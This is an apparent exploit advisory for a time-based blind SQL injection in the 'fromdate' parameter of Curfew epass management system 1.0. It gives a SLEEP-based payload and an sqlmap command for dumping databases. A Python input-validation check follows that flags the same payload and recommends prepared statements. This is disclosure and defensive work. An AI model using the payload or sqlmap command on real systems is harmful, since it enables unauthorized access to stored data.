Exploits / Vulnerability Discovered: 2024-02-05
Type: webapps
Platform: php
This exploit / vulnerability (Curfew epass management system 1.0 fromdate SQL injection) is for educational purposes only; if you use it, you do so at your own risk!
1) Log in to the application
2) Click on report on pass and capture the request in Burp Suite
3) The "FromDate" parameter is vulnerable to SQL injection:
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
'SOzQ'='SOzQ&todate=&submit=
4) Put '*' in the value for the parameter and save the item as cpme
5) Run sqlmap -r cpme --batch --dbs --random-agent
Curfew epass management system 1.0 fromdate sql injection
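
A defender-side check for the report request described above, as an added example that is not part of the original write-up or the application's code: it inspects a urlencoded POST body and flags `fromdate`/`todate` values that are not plain dates or that contain a time-delay call like the quoted payload. The YYYY-MM-DD format, the optional blank value and the sample bodies are assumptions made for this example.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs

DATE_FIELDS = ("fromdate", "todate")  # parameter names from the write-up
# Markers of time-based blind probes such as the SLEEP() payload above.
DELAY_MARKERS = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)


def is_iso_date(value: str) -> bool:
    """True only for a real calendar date written exactly as YYYY-MM-DD."""
    try:
        parsed = datetime.strptime(value, "%Y-%m-%d")
    except ValueError:
        return False
    # Round trip rejects loose forms such as 2024-1-1.
    return parsed.strftime("%Y-%m-%d") == value


def inspect_report_body(body: str) -> list[str]:
    """Return findings for one urlencoded POST body; empty list means clean."""
    findings = []
    params = parse_qs(body, keep_blank_values=True)
    for field in DATE_FIELDS:
        for value in params.get(field, []):
            if value == "":
                continue  # assumption: a blank date field is allowed
            if not is_iso_date(value):
                findings.append(f"{field}: not a YYYY-MM-DD date")
            if DELAY_MARKERS.search(value):
                findings.append(f"{field}: time-delay function call")
    return findings


# Constructed sample bodies: a normal report request, and one carrying the
# payload quoted in the write-up.
SAMPLES = {
    "benign": "fromdate=2024-01-01&todate=2024-01-31&submit=",
    "probe": "fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND "
             "'SOzQ'='SOzQ&todate=&submit=",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_report_body(body))
```

The same strict date check belongs in the application before the query is built, with the values then passed as bound parameters of a prepared statement rather than concatenated into SQL.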